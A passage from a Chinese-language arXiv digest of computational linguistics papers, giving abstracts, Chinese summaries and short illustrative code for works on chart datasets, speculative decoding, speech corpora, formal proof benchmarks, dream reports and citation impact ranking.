作者: Jovana Kondic,Pengyuan Li,Dhiraj Joshi,Isaac Sanchez,Ben Wiesel,Shafiq Abedin,Amit Alfassy,Eli Schwartz,Daniel Caraballo,Yagmur Gizem Cinar,Florian Scheidegger,Steven I. Ross,Daniel Karl I. Weidele,Hang Hua,Ekaterina Arutyunova,Roei Herzig,Zexue He,Zihan Wang,Xinyue Yu,Yunfei Zhao,Sicong Jiang,Minghao Liu,Qunshu Lin,Peter Staar,Luis Lastras,Aude Oliva,Rogerio Feris
机构: MIT(麻省理工学院); MIT-IBM Watson AI Lab(麻省理工-IBM沃森人工智能实验室); IBM Research(IBM研究院); Abaka AI
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: Accepted at CVPR 2026
Abstract:Understanding charts requires models to jointly reason over geometric visual patterns, structured numerical data, and natural language – a capability where current vision-language models (VLMs) remain limited. We introduce ChartNet, a high-quality, million-scale multimodal dataset designed to advance chart interpretation and reasoning. ChartNet leverages a novel code-guided synthesis pipeline to generate 1.5 million diverse chart samples spanning 24 chart types and 6 plotting libraries. Each sample consists of five aligned components: plotting code, rendered chart image, data table, natural language summary, and question-answering with reasoning, providing fine-grained cross-modal alignment. To capture the full spectrum of chart comprehension, ChartNet additionally includes specialized subsets encompassing human annotated data, real-world data, safety, and grounding. Moreover, a rigorous quality-filtering pipeline ensures visual fidelity, semantic accuracy, and diversity across chart representations. Fine-tuning on ChartNet consistently improves results across benchmarks, demonstrating its utility as large-scale supervision for multimodal models. As the largest open-source dataset of its kind, ChartNet aims to support the development of foundation models with robust and generalizable capabilities for data visualization understanding. The dataset is publicly available at this https URL
[NLP-80] Debiasing Large Language Models toward Social Factors in Online Behavior Analytics through Prompt Knowledge Tuning
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在社会情境下因缺乏对个体行为归因机制的建模而产生的偏见问题,即模型在推理过程中未能有效区分行为是由个人特质( dispositional causality)还是情境因素(situational causality)驱动,从而导致对社交内容的理解偏差。解决方案的关键在于引入一种可扩展的提示增强方法,通过将用户意图作为知识源以推断个人归因,并结合消息上下文以推断情境归因,从而在零样本分类任务中提升模型性能并降低社会归因偏差。该方法在灾难领域社交媒体的意图识别和主题检测任务中展现出跨灾害类型与多语言场景下的有效性,并验证了Llama3、Mistral和Gemma等开源模型的社会归因偏见及其缓解策略的有效性。
链接: https://arxiv.org/abs/2603.27057
作者: Hossein Salemi,Jitin Krishnan,Hemant Purohit
机构: George Mason University (乔治梅森大学)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: This is a preprint of the accepted paper for publication in IEEE Transactions on Computational Social Systems
Abstract:Attribution theory explains how individuals interpret and attribute others’ behavior in a social context by employing personal (dispositional) and impersonal (situational) causality. Large Language Models (LLMs), trained on human-generated corpora, may implicitly mimic this social attribution process in social contexts. However, the extent to which LLMs utilize these causal attributions in their reasoning remains underexplored. Although using reasoning paradigms, such as Chain-of-Thought (CoT), has shown promising results in various tasks, ignoring social attribution in reasoning could lead to biased responses by LLMs in social contexts. In this study, we investigate the impact of incorporating a user’s goal as knowledge to infer dispositional causality and message context to infer situational causality on LLM performance. To this end, we introduce a scalable method to mitigate such biases by enriching the instruction prompts for LLMs with two prompt aids using social-attribution knowledge, based on the context and goal of a social media message. This method improves the model performance while reducing the social-attribution bias of the LLM in the reasoning on zero-shot classification tasks for behavior analytics applications. We empirically show the benefits of our method across two tasks-intent detection and theme detection on social media in the disaster domain-when considering the variability of disaster types and multiple languages of social media. Our experiments highlight the biases of three open-source LLMs: Llama3, Mistral, and Gemma, toward social attribution, and show the effectiveness of our mitigation strategies.
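论文的去偏方法核心是在指令提示中显式注入两类归因线索。下面是一个假设性的提示模板草图,字段命名与措辞均为演示而设,并非论文使用的实际提示词:

```python
def build_debiased_prompt(message, user_goal, message_context,
                          task="intent detection"):
    """构造零样本分类提示:
    - 个人归因线索(dispositional):用户目标;
    - 情境归因线索(situational):消息上下文。
    二者共同作为社会归因知识注入指令。"""
    return (
        f"Task: {task} (zero-shot)\n"
        f"Dispositional cue - user goal: {user_goal}\n"
        f"Situational cue - message context: {message_context}\n"
        f"Message: {message}\n"
        "Label:"
    )
```

这种做法的可扩展性在于:目标与上下文两个字段可由上游流程自动填充,无需为每个灾害类型或语言人工改写提示。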
[NLP-81] Introducing MELI: the Mandarin-English Language Interview Corpus LREC2026
【速读】: 该论文旨在解决多语言语音数据资源匮乏的问题,特别是在汉语(Mandarin)与英语双语者自然交流场景下的跨语言声学对比分析需求。其解决方案的关键在于构建并发布MELI语料库——一个包含51名双语者在中文和英文中分别进行朗读与自发访谈的29.8小时开放源代码语音数据集,涵盖音频(44.1 kHz, 16-bit, 立体声)、逐词与逐音素强制对齐标注、完整转录及匿名化处理,并系统记录了语言切换模式与说话人语言态度关联信息,从而支持跨语言、跨说话人的声学比较与定性定量结合的语言行为研究。
链接: https://arxiv.org/abs/2603.27043
作者: Suyuan Liu,Molly Babel
机构: 未知
类目: Computation and Language (cs.CL)
备注: Accepted at LREC 2026 (14th International Conference on Language Resources and Evaluation), to appear in the conference proceedings
Abstract:We introduce the Mandarin-English Language Interview (MELI) Corpus, an open-source resource of 29.8 hours of speech from 51 Mandarin-English bilingual speakers. MELI combines matched sessions in Mandarin and English with two speaking styles: read sentences and spontaneous interviews about language varieties, standardness, and learning experiences. Audio was recorded at 44.1 kHz (16-bit, stereo). Interviews were fully transcribed, force-aligned at word and phone levels, and anonymized. Descriptively, the Mandarin component totals ~14.7 hours (mean duration 17.3 minutes) and the English component ~15.1 hours (mean duration 17.8 minutes). We report token/type statistics for each language and document code-switching patterns (frequent in Mandarin sessions; more limited in English sessions). The corpus design supports within-/cross-speaker, within/cross-language acoustic comparison and links acoustics to speakers’ stated language attitudes, enabling both quantitative and qualitative analyses. The MELI Corpus will be released with transcriptions, alignments, metadata, scans of labelled maps and documentation under a CC BY-NC 4.0 license.
[NLP-82] APS: Task Aware Proposal Distributions for Speculative Sampling
【速读】: 该论文旨在解决推测解码(speculative decoding)中轻量级草稿模型(draft model)的训练数据分布对解码质量影响不明确的问题,即探究草稿模型的性能是否依赖于其训练数据与下游任务之间的匹配程度。解决方案的关键在于:首先通过在不同数据集(MathInstruct、ShareGPT及混合数据)上训练轻量级草稿模型(HASS和EAGLE-2),评估其在多个基准测试(如MT-Bench、GSM8K等)上的接受长度(acceptance length)表现,发现任务特定训练能显著提升草稿模型在对应任务上的解码效率;其次提出在推理阶段采用基于置信度的路由策略(confidence-based routing) 和 合并树验证(merged-tree verification)机制 来组合多个专业化草稿模型,相较于权重空间平均或简单集成,该方法能更有效地提升整体接受长度,且置信度比熵更具判别力,从而实现更优的推测解码性能。
链接: https://arxiv.org/abs/2603.27027
作者: Mohamad Zbib,Mohamad Bazzi,Ammar Mohanna,Hasan Abed Al Kader Hammoud,Bernard Ghanem
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: 21 pages, 11 figures. Code: this https URL Weights: this https URL Datasets: this https URL
Abstract:Speculative decoding accelerates autoregressive generation by letting a lightweight draft model propose future tokens that a larger target model then verifies in parallel. In practice, however, draft models are usually trained on broad generic corpora, which leaves it unclear how much speculative decoding quality depends on the draft training distribution. We study this question with lightweight HASS and EAGLE-2 drafters trained on MathInstruct, ShareGPT, and mixed-data variants, evaluated on MT-Bench, GSM8K, MATH-500, and SVAMP. Measured by acceptance length, task-specific training yields clear specialization: MathInstruct-trained drafts are strongest on reasoning benchmarks, while ShareGPT-trained drafts are strongest on MT-Bench. Mixed-data training improves robustness, but larger mixtures do not dominate across decoding temperatures. We also study how to combine specialized drafters at inference time. Naive checkpoint averaging performs poorly, whereas confidence-based routing improves over single-domain drafts and merged-tree verification yields the highest acceptance length overall for both backbones. Finally, confidence is a more useful routing signal than entropy: rejected tokens tend to have higher entropy, but confidence produces much clearer benchmark-level routing decisions. These results show that speculative decoding quality depends not only on draft architecture, but also on the match between draft training data and downstream workload, and that specialized drafters are better combined at inference time than in weight space.
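摘要中的"基于置信度的路由"(confidence-based routing)可以用如下极简示意来理解(假设性实现,并非论文官方代码,函数名与数据均为示意):路由器比较各专业化草稿模型在探测前缀上的平均 top-1 概率,选出最"自信"的草稿模型来提议后续 token。

```python
# 置信度路由的极简示意(假设性实现,非论文官方代码):
# 每个草稿模型对探测前缀给出逐 token 的 top-1 概率,
# 路由器选择平均置信度最高的草稿模型。

def route_by_confidence(drafter_probs: dict[str, list[float]]) -> str:
    """drafter_probs: 草稿模型名 -> 其在探测前缀上的 top-1 概率序列。"""
    def mean(xs):
        return sum(xs) / len(xs)
    return max(drafter_probs, key=lambda name: mean(drafter_probs[name]))

# 数学类请求上,数学专用草稿模型通常更"自信"
probs = {
    "draft_math": [0.92, 0.88, 0.95],
    "draft_chat": [0.61, 0.70, 0.55],
}
print(route_by_confidence(probs))  # draft_math
```

真实系统中,被路由选中的草稿模型生成的候选 token 还需由目标模型并行验证;论文中接受长度最高的方案是进一步采用合并树验证(merged-tree verification)。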
[NLP-83] Pashto Common Voice: Building the First Open Speech Corpus for a 60-Million-Speaker Low-Resource Language INTERSPEECH2026
【速读】: 该论文旨在解决帕什图语(Pashto)在开放语音技术资源中严重缺失的问题,其目标是构建首个大规模、开放许可的帕什图语语音语料库——Pashto Common Voice (MCV),以支持生成式 AI (Generative AI) 和语音识别模型的开发与训练。解决方案的关键在于多渠道社区参与机制:包括界面本地化、基于维基百科的句子提取与自动化过滤、针对四种最常被省略的帕什图语音素的定向贡献,以及通过VOA帕什图广播活动显著提升参与者数量(从CV17到CV18增长约108倍)。最终,MCV23包含107,781个音频片段(60,337个经验证),并实现了在Whisper Base模型上将词错误率(WER)从零样本下的99.0%降至13.4%,证明了该语料库对帕什图语语音识别任务的有效性。
链接: https://arxiv.org/abs/2603.27021
作者: Hanif Rahman,Shafeeq ur Rehman
机构: 未知
类目: Computation and Language (cs.CL)
备注: Submitted to Interspeech 2026
Abstract:We present the Pashto Common Voice corpus – the first large-scale, openly licensed speech resource for Pashto, a language with over 60 million native speakers largely absent from open speech technology. Through a community effort spanning 2022-2025, the corpus grew from 1.5 hours and 5 contributors to 147 total hours and 1,483 unique speakers across ten Mozilla Common Voice releases (CV14-CV23). Speaker participation increased approximately 108-fold between CV17 and CV18, coinciding with a VOA Pashto broadcast campaign. We describe the full methodology: interface localisation, Wikipedia-based sentence extraction with automated filtering, phonemically targeted contributions for the four most frequently dropped Pashto characters, and multi-channel community outreach. MCV23 contains 107,781 clips (60,337 validated; 82.33 validated hours) across 13 content domains. Fine-tuning Whisper Base on MCV20 yields 13.4% WER on the MCV20 test split, against the published Whisper Base zero-shot WER of 99.0% on Pashto.
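摘要中报告的 WER(词错误率)可按标准的词级编辑距离计算。下面是一个自包含的参考实现(示意性质,实际评测通常使用 jiwer 等工具并包含文本归一化步骤):

```python
def wer(ref: str, hyp: str) -> float:
    """词错误率 = (替换 + 插入 + 删除) / 参考词数,经典动态规划实现。"""
    r, h = ref.split(), hyp.split()
    d = [[0] * (len(h) + 1) for _ in range(len(r) + 1)]
    for i in range(len(r) + 1):
        d[i][0] = i
    for j in range(len(h) + 1):
        d[0][j] = j
    for i in range(1, len(r) + 1):
        for j in range(1, len(h) + 1):
            cost = 0 if r[i - 1] == h[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,        # 删除
                          d[i][j - 1] + 1,        # 插入
                          d[i - 1][j - 1] + cost) # 替换或匹配
    return d[len(r)][len(h)] / len(r)

print(wer("the cat sat", "the cat sat"))     # 0.0
print(wer("the cat sat", "the bat sat on"))  # 1 替换 + 1 插入,约 0.667
```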
[NLP-84] RASPRef: Retrieval-Augmented Self-Supervised Prompt Refinement for Large Reasoning Models
【速读】: 该论文旨在解决当前生成式AI(Generative AI)在结构化推理任务中对提示(prompt)形式高度敏感的问题,即有效提示的设计通常依赖人工迭代且难以跨任务或领域扩展。解决方案的关键在于提出一种无需人类标注或任务特定监督的自监督提示优化框架——检索增强型自监督提示精炼(Retrieval-Augmented Self-Supervised Prompt Refinement, RASPRef),其核心机制是通过检索相关示例和历史推理轨迹,并利用多样本一致性、验证器反馈及模型自生成批评等信号,对提示本身进行迭代式优化,从而提升模型在GSM8K类数学推理任务中的表现。
链接: https://arxiv.org/abs/2603.27008
作者: Rahul Soni
机构: Independent Researcher (独立研究员)
类目: Computation and Language (cs.CL)
备注:
Abstract:Recent reasoning-focused language models such as DeepSeek R1 and OpenAI o1 have demonstrated strong performance on structured reasoning benchmarks including GSM8K, MATH, and multi-hop question answering tasks. However, their performance remains highly sensitive to prompt formulation, and designing effective prompts is typically a manual and iterative process that does not scale well across tasks or domains. To address this limitation, we introduce Retrieval-Augmented Self-Supervised Prompt Refinement (RASPRef), a framework that improves prompts without requiring human annotations or task-specific supervision. The approach retrieves relevant examples and previously generated reasoning trajectories, and leverages signals such as multi-sample consistency, verifier feedback, and model-generated critiques to iteratively refine the prompt. Unlike prior approaches that focus primarily on improving model outputs, RASPRef directly treats the prompt as the optimization target and improves it through an iterative retrieval-guided refinement process. Experiments on GSM8K-style mathematical reasoning tasks show that retrieval-guided prompting improves performance compared with a static prompting baseline. We further discuss how retrieval quality, trajectory selection, and self-supervised feedback signals may influence the effectiveness of prompt refinement. These findings suggest that prompt design remains a critical factor for reasoning-oriented language models, and that self-improving prompts offer a practical and scalable strategy for improving reasoning performance.
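摘要中提到的"多样本一致性"信号可以用如下极简示意理解(假设性实现,非论文官方代码):对同一提示多次采样,多数答案所占比例即一致性得分;精炼过程中优先保留得分更高的提示版本。

```python
from collections import Counter

def consistency_score(answers: list[str]) -> float:
    """多样本一致性:同一提示多次采样后,多数答案占比越高,提示越可靠。"""
    top = Counter(answers).most_common(1)[0][1]
    return top / len(answers)

# 假设性示例:提示 A 的采样结果比提示 B 更一致,迭代精炼时保留 A
print(consistency_score(["42", "42", "42", "41"]))  # 0.75
print(consistency_score(["42", "17", "9", "42"]))   # 0.5
```

实际框架中,该信号还会与验证器反馈、模型自生成批评一起,共同指导对提示本身的迭代修改。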
[NLP-85] The Last Fingerprint: How Markdown Training Shapes LLM Prose
【速读】: 该论文试图解决的问题是:大型语言模型(Large Language Models, LLMs)在生成文本时普遍存在“过度使用破折号(em dash)”的现象,这一现象虽被广泛讨论为AI生成文本的标志之一,但缺乏对其内在机制的解释,且未与模型训练中常见的Markdown格式偏好建立联系。解决方案的关键在于提出“破折号是Markdown结构残留”的假设,即LLMs从以Markdown为主的训练数据中内化了结构化表达习惯,导致破折号作为最小未被清除的结构单元持续出现在自然语言输出中;通过五步演化路径(训练数据组成→结构内化→破折号双功能属性→后训练放大效应)和多条件抑制实验(包括禁用Markdown指令、显式禁止破折号等),验证了该现象并非随机或风格缺陷,而是特定微调流程(如RLHF)的稳定标记,从而将原本孤立的两个在线讨论(破折号滥用与Markdown倾向)统一为可诊断模型微调方法的新指标。
链接: https://arxiv.org/abs/2603.27006
作者: E. M. Freeburg
机构: Anthropic; OpenAI; Meta; Google; DeepSeek
类目: Computation and Language (cs.CL)
备注: 14 pages, 3 tables. Code and data: this https URL
Abstract:Large language models produce em dashes at varying rates, and the observation that some models “overuse” them has become one of the most widely discussed markers of AI-generated text. Yet no mechanistic account of this pattern exists, and the parallel observation that LLMs default to markdown-formatted output has never been connected to it. We propose that the em dash is markdown leaking into prose – the smallest surviving unit of the structural orientation that LLMs acquire from markdown-saturated training corpora. We present a five-step genealogy connecting training data composition, structural internalization, the dual-register status of the em dash, and post-training amplification. We test this with a two-condition suppression experiment across twelve models from five providers (Anthropic, OpenAI, Meta, Google, DeepSeek): when models are instructed to avoid markdown formatting, overt features (headers, bullets, bold) are eliminated or nearly eliminated, but em dashes persist – except in Meta’s Llama models, which produce none at all. Em dash frequency and suppression resistance vary from 0.0 per 1,000 words (Llama) to 9.1 (GPT-4.1 under suppression), functioning as a signature of the specific fine-tuning procedure applied. A three-condition suppression gradient shows that even explicit em dash prohibition fails to eliminate the artifact in some models, and a base-vs-instruct comparison confirms that the latent tendency exists pre-RLHF. These findings connect two previously isolated online discourses and reframe em dash frequency as a diagnostic of fine-tuning methodology rather than a stylistic defect.
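论文统计的"每千词破折号频次"指标本身很容易复现,下面是一个示意实现(分词方式为简单空白切分,与论文实际统计口径未必一致):

```python
def em_dash_rate(text: str) -> float:
    """每千词的 em dash(U+2014)出现次数;空文本返回 0。"""
    words = text.split()
    if not words:
        return 0.0
    return text.count("\u2014") / len(words) * 1000

print(em_dash_rate("a b c d e"))        # 0.0
print(em_dash_rate("a \u2014 b c d"))   # 5 个词元中出现 1 次,即 200.0
```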
[NLP-86] FormalProofBench: Can Models Write Graduate Level Math Proofs That Are Formally Verified? ICLR2026 WWW
【速读】: 该论文旨在解决当前前沿生成式 AI (Generative AI) 模型在数学证明自动化方面的局限性,特别是其在产出可形式化验证的研究生级别数学证明(formally verified mathematical proofs)上的能力不足问题。解决方案的关键在于构建一个名为 FormalProofBench 的私有基准测试集,该基准涵盖分析、代数、概率与逻辑等核心数学领域,每项任务均以自然语言问题与 Lean 4 形式化陈述配对,并要求模型输出经 Lean 4 检查器验证通过的正式证明;同时采用代理式(agentic)评估框架对多种前沿模型进行系统性评测,从而全面衡量模型在工具调用、失败模式、成本和延迟等方面的性能表现。
链接: https://arxiv.org/abs/2603.26996
作者: Nikil Ravi,Kexing Ying,Vasilii Nesterov,Rayan Krishnan,Elif Uskuplu,Bingyu Xia,Janitha Aswedige,Langston Nashold
机构: Vals AI; École Polytechnique Fédérale de Lausanne (瑞士洛桑联邦理工学院); Moscow Institute of Physics and Technology (莫斯科物理技术学院); Indiana University, Bloomington (印第安纳大学布卢明顿分校); Independent Researcher
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Machine Learning (cs.LG); Programming Languages (cs.PL)
备注: Accepted at ICLR 2026 Workshop: VerifAI-2: The Second Workshop on AI Verification in the Wild. Live leaderboard hosted here: this https URL
Abstract:We present FormalProofBench, a private benchmark designed to evaluate whether AI models can produce formally verified mathematical proofs at the graduate level. Each task pairs a natural-language problem with a Lean 4 formal statement, and a model must output a Lean proof accepted by the Lean 4 checker. FormalProofBench targets advanced undergraduate and graduate mathematics, with problems drawn from qualifying exams and standard textbooks across topics including analysis, algebra, probability, and logic. We evaluate a range of frontier models with an agentic harness, and find that the best-performing foundation model achieves 33.5% accuracy, with performance dropping rapidly after that. In addition to the accuracy numbers, we also provide empirical analysis of tool-use, failure modes, cost and latency, thereby providing a thorough evaluation of the formal-theorem proving abilities of frontier models.
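为直观说明"被 Lean 4 检查器接受的证明"是什么形态,下面给出两个能通过 Lean 4 类型检查的极简示例(难度远低于该基准中的研究生级题目,仅作形态示意):

```lean
-- 自然数算术命题:rfl 表示等式在定义层面直接成立
example : 2 + 2 = 4 := rfl

-- 合取交换:从 p ∧ q 的证明构造 q ∧ p 的证明
theorem and_swap (p q : Prop) : p ∧ q → q ∧ p :=
  fun ⟨hp, hq⟩ => ⟨hq, hp⟩
```

基准中的任务则需要模型针对分析、代数等领域的完整形式化陈述给出同样可机检的证明,这也是目前最强模型准确率仅 33.5% 的原因所在。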
[NLP-87] A large corpus of lucid and non-lucid dream reports
【速读】: 该论文旨在解决 lucid dream(清醒梦)研究中因报告稀少且难以主动诱发而导致的样本不足问题,从而限制了对清醒梦现象学特征的深入理解与应用开发。其解决方案的关键在于构建了一个大规模、公开可用的梦境报告语料库,包含来自5000名贡献者的55,000条梦境记录,并通过用户自愿标注的方式获得10,000条清醒梦、25,000条非清醒梦及2,000条噩梦标签。该标注体系使得语言模式分析成为可能,验证结果表明清醒梦标签报告中的语言特征与已知的清醒梦特性一致,为未来清醒梦研究提供了高质量的数据基础和方法论支撑。
链接: https://arxiv.org/abs/2603.26992
作者: Remington Mallett
机构: 未知
类目: Computation and Language (cs.CL)
备注:
Abstract:All varieties of dreaming remain a mystery. Lucid dreams in particular, or those characterized by awareness of the dream, are notoriously difficult to study. Their scarce prevalence and resistance to deliberate induction make it difficult to obtain a sizeable corpus of lucid dream reports. The consequent lack of clarity around lucid dream phenomenology has left the many purported applications of lucidity under-realized. Here, a large corpus of 55k dream reports from 5k contributors is curated, described, and validated for future research. Ten years of publicly available dream reports were scraped from an online forum where users share anonymous dream journals. Importantly, users optionally categorize their dream as lucid, non-lucid, or a nightmare, offering a user-provided labeling system that includes 10k lucid, 25k non-lucid, and 2k nightmare labels. After characterizing the corpus with descriptive statistics and visualizations, construct validation shows that language patterns in lucid-labeled reports are consistent with known characteristics of lucid dreams. While the entire corpus has broad value for dream science, the labeled subset is particularly powerful for new discoveries in lucid dream studies.
[NLP-88] Multilingual Stutter Event Detection for English German and Mandarin Speech
【速读】: 该论文旨在解决自动化口吃检测系统在不同语言环境下泛化能力不足的问题,即现有方法往往依赖单一语言数据训练,导致跨语言迁移性能受限。其解决方案的关键在于利用多语种(英语、德语)和多语料库的标注数据进行联合训练,使模型能够捕捉到跨语言一致的口吃特征(stuttering characteristics),从而实现语言无关的鲁棒检测。实验表明,这种多语言训练策略不仅性能可媲美甚至优于以往单语模型,还验证了口吃在不同语言间存在一致性,为构建通用型口吃检测系统提供了可行路径。
链接: https://arxiv.org/abs/2603.26939
作者: Felix Haas,Sebastian P. Bayerl
机构: 未知
类目: Sound (cs.SD); Computation and Language (cs.CL); Audio and Speech Processing (eess.AS)
备注:
Abstract:This paper presents a multi-label stuttering detection system trained on multi-corpus, multilingual data in English, German, and Mandarin. By leveraging annotated stuttering data from three languages and four corpora, the model captures language-independent characteristics of stuttering, enabling robust detection across linguistic contexts. Experimental results demonstrate that multilingual training achieves performance comparable to and, in some cases, even exceeds that of previous systems. These findings suggest that stuttering exhibits cross-linguistic consistency, which supports the development of language-agnostic detection systems. Our work demonstrates the feasibility and advantages of using multilingual data to improve generalizability and reliability in automated stuttering detection.
[NLP-89] In your own words: computationally identifying interpretable themes in free-text survey data
【速读】: 该论文旨在解决自由文本调查数据难以进行统计分析的问题,尤其是如何从非结构化文本中提取出可解释且具有实际应用价值的主题。其解决方案的关键在于提出了一种名为“In Your Own Words”的计算框架,该框架能够更精确地识别自由文本中的结构化、可解释主题,从而支持系统性的探索性分析。相较于以往方法,该框架不仅提升了主题识别的准确性,还为问卷设计优化、揭示标准化分类内部异质性以及阐明自我认同与感知认同之间的系统性不一致提供了新的洞见。
链接: https://arxiv.org/abs/2603.26930
作者: Jenny S Wang,Aliya Saperstein,Emma Pierson
机构: Harvard Business School (哈佛商学院); Stanford University (斯坦福大学); University of California, Berkeley (加州大学伯克利分校)
类目: Computers and Society (cs.CY); Computation and Language (cs.CL)
备注:
Abstract:Free-text survey responses can provide nuance often missed by structured questions, but remain difficult to statistically analyze. To address this, we introduce In Your Own Words, a computational framework for exploratory analyses of free-text survey data that identifies structured, interpretable themes in free-text responses more precisely than previous computational approaches, facilitating systematic analysis. To illustrate the benefits of this approach, we apply it to a new dataset of free-text descriptions of race, gender, and sexual orientation from 1,004 U.S. participants. The themes our approach learns have three practical applications in survey research. First, the themes can suggest structured questions to add to future surveys by surfacing salient constructs – such as belonging and identity fluidity – that existing surveys do not capture. Second, the themes reveal heterogeneity within standardized categories, explaining additional variation in health, well-being, and identity importance. Third, the themes illuminate systematic discordance between self-identified and perceived identities, highlighting mechanisms of misrecognition that existing measures do not reflect. More broadly, our framework can be deployed in a wide range of survey settings to identify interpretable themes from free text, complementing existing qualitative methods.
[NLP-90] Magic Words or Methodical Work? Challenging Conventional Wisdom in LLM -Based Political Text Annotation
【速读】: 该论文旨在解决政治科学领域中大规模语言模型(Large Language Models, LLMs)在文本标注任务中的实现选择敏感性问题,即不同模型、模型规模、学习方法和提示风格的组合如何影响标注结果,以及当前广泛采纳的“最佳实践”是否在严格控制条件下依然有效。其解决方案的关键在于提出一种验证优先(validation-first)框架:通过系统性基准测试揭示交互效应主导主效应的现象,强调应以结构化顺序决策、提示冻结与保留评估、标准化报告规范及开源工具支持,来提升研究过程的透明度与可重复性,从而规避因随意选择模型或提示策略而导致的研究者自由度偏差。
链接: https://arxiv.org/abs/2603.26898
作者: Lorca McLaren,James Cross,Zuzanna Krakowska,Robin Rauner,Martijn Schoonvelde
机构: University College Dublin(都柏林大学); University of Groningen(格罗宁根大学)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:Political scientists are rapidly adopting large language models (LLMs) for text annotation, yet the sensitivity of annotation results to implementation choices remains poorly understood. Most evaluations test a single model or configuration; how model choice, model size, learning approach, and prompt style interact, and whether popular “best practices” survive controlled comparison, are largely unexplored. We present a controlled evaluation of these pipeline choices, testing six open-weight models across four political science annotation tasks under identical quantisation, hardware, and prompt-template conditions. Our central finding is methodological: interaction effects dominate main effects, so seemingly reasonable pipeline choices can become consequential researcher degrees of freedom. No single model, prompt style, or learning approach is uniformly superior, and the best-performing model varies across tasks. Two corollaries follow. First, model size is an unreliable guide both to cost and to performance: cross-family efficiency differences are so large that some larger models are less resource-intensive than much smaller alternatives, while within model families mid-range variants often match or exceed larger counterparts. Second, widely recommended prompt engineering techniques yield inconsistent and sometimes negative effects on annotation performance. We use these benchmark results to develop a validation-first framework - with a principled ordering of pipeline decisions, guidance on prompt freezing and held-out evaluation, reporting standards, and open-source tools - to help researchers navigate this decision space transparently.
[NLP-91] Arithmetic OOD Failure Unfolds in Stages in Minimal GPTs
【速读】: 该论文旨在解决生成式模型在算术外推(Out-of-Distribution, OOD)场景下,尤其是从2位数加法推广到3位数加法时的失败机制问题。研究发现,这种失败并非单一原因所致,而是具有阶段性特征:首先存在布局障碍(layout barrier),即模型对绝对位置的依赖导致其在纯3位数布局下失效;其次,在修复布局后,百位数字表现为“进位标志”而非语义上的百位数值(carry-semantics failure);再次,即使修正了进位语义,仍存在条件重组瓶颈(conditional recomposition bottleneck),即模型难以有效组合高条件尾部数据;最后,残余错误主要集中在十位数上,通过引入符号感知的十位修复策略可显著提升性能。因此,论文提出了一种实验可验证的分解框架,将算术OOD失败系统性地拆解为布局、进位语义、重组和晚期十位残差四个阶段,并针对性地提出干预方案,揭示了模型泛化失败的多层级成因与改进路径。
链接: https://arxiv.org/abs/2603.26828
作者: Seine A. Shintani
机构: 未知
类目: Computation and Language (cs.CL); Machine Learning (cs.LG)
备注: 16 pages, 4 figures
Abstract:Arithmetic benchmarks are often reduced to a single held-out score, but that score can conflate qualitatively different failures. We study a controlled minimal GPT trained on exhaustive 2-digit addition, where all local digit transitions are already present in training, and ask why 3-digit generalization still fails. The failure is staged. First, there is a layout barrier: a learned absolute-position model collapses under a pure 3-digit layout shift, and mixed-layout exposure is the only intervention that materially weakens this barrier. Second, after layout repair, the hundreds position behaves like a carry flag rather than a semantic hundreds digit; targeted carry probes reverse the relevant logit margin, whereas a matched extra-data control does not. Third, after carry repair, the main remaining bottleneck is conditional recomposition: high-conditioned tail data outperforms a matched control, high-only data, and tail-only data on all true-3-digit suites, and the same ordering reappears in a larger 2-layer bridge experiment. The residual errors after recomposition are then overwhelmingly tens-only, and a separate 10-seed late-stage study shows that a sign-aware tens repair raises exact match on the hardest thousands-carry suite from 0.664 to 0.822. We therefore provide an experimentally testable decomposition of arithmetic OOD failure into layout, carry-semantics, recomposition, and late tens-residual stages.
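论文的实验设置(穷举 2 位数加法作为训练分布,3 位数加法作为 OOD 测试)可以用如下数据构造示意(假设性代码,样本的文本格式仅为示意,并非论文使用的确切布局):

```python
# 示意:穷举 2 位数加法作训练集,3 位数加法作 OOD 测试集
def make_examples(lo, hi, n=None):
    """生成 [lo, hi) 范围内所有加法算式字符串;n 用于截取前 n 条。"""
    pairs = [(a, b) for a in range(lo, hi) for b in range(lo, hi)]
    if n is not None:
        pairs = pairs[:n]
    return [f"{a}+{b}={a + b}" for a, b in pairs]

train = make_examples(10, 100)       # 全部 2 位数加法:90*90 = 8100 条
ood = make_examples(100, 1000, 5)    # 3 位数加法(OOD)的前几条
print(len(train), ood[0])  # 8100 100+100=200
```

在这种设置下,所有局部数位转移在训练中都已出现,论文据此将 3 位数泛化失败拆解为布局、进位语义、重组与十位残差四个阶段逐一归因。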
[NLP-92] CRISP: Characterizing Relative Impact of Scholarly Publications
【速读】: 该论文旨在解决现有文献影响力评估方法中因孤立分析单篇引用文本而导致无法进行跨引用比较的问题。传统方法仅关注引文在被引论文中的局部上下文,忽略了引用列表的整体语境信息,从而限制了对引用影响力的真实区分能力。其解决方案的关键在于提出CRISP框架,通过大语言模型(Large Language Models, LLMs)联合排序同一论文所引用的所有文献,利用全引用上下文提升判断准确性;同时为缓解LLM的顺序偏差,采用三次随机化排序并以多数投票聚合影响标签,实现更可靠、高效且成本可控的引用影响力分析。
链接: https://arxiv.org/abs/2603.26791
作者: Hannah Collison,Benjamin Van Durme,Daniel Khashabi
机构: Johns Hopkins University (约翰霍普金斯大学)
类目: Digital Libraries (cs.DL); Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Computers and Society (cs.CY)
备注:
Abstract:Assessing a cited paper’s impact is typically done by analyzing its citation context in isolation within the citing paper. While this focuses on the most directly relevant text, it prevents relative comparisons across all the works a paper cites. We propose CRISP, which instead jointly ranks all cited papers within a citing paper using large language models (LLMs). To mitigate LLMs’ positional bias, we rank each list three times in a randomized order and aggregate the impact labels through majority voting. This joint approach leverages the full citation context, rather than evaluating citations independently, to more reliably distinguish impactful references. CRISP outperforms a prior state-of-the-art impact classifier by +9.5% accuracy and +8.3% F1 on a dataset of human-annotated citations. CRISP further gains efficiency through fewer LLM calls and performs competitively with an open-source model, enabling scalable, cost-effective citation impact analysis. We release our rankings, impact labels, and codebase to support future research.
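CRISP 的"三次随机排序 + 多数投票"聚合流程可概括为如下示意(假设性实现;真实系统中 rank_fn 由 LLM 对整份引用列表联合打标,此处用固定函数代替):

```python
import random
from collections import Counter
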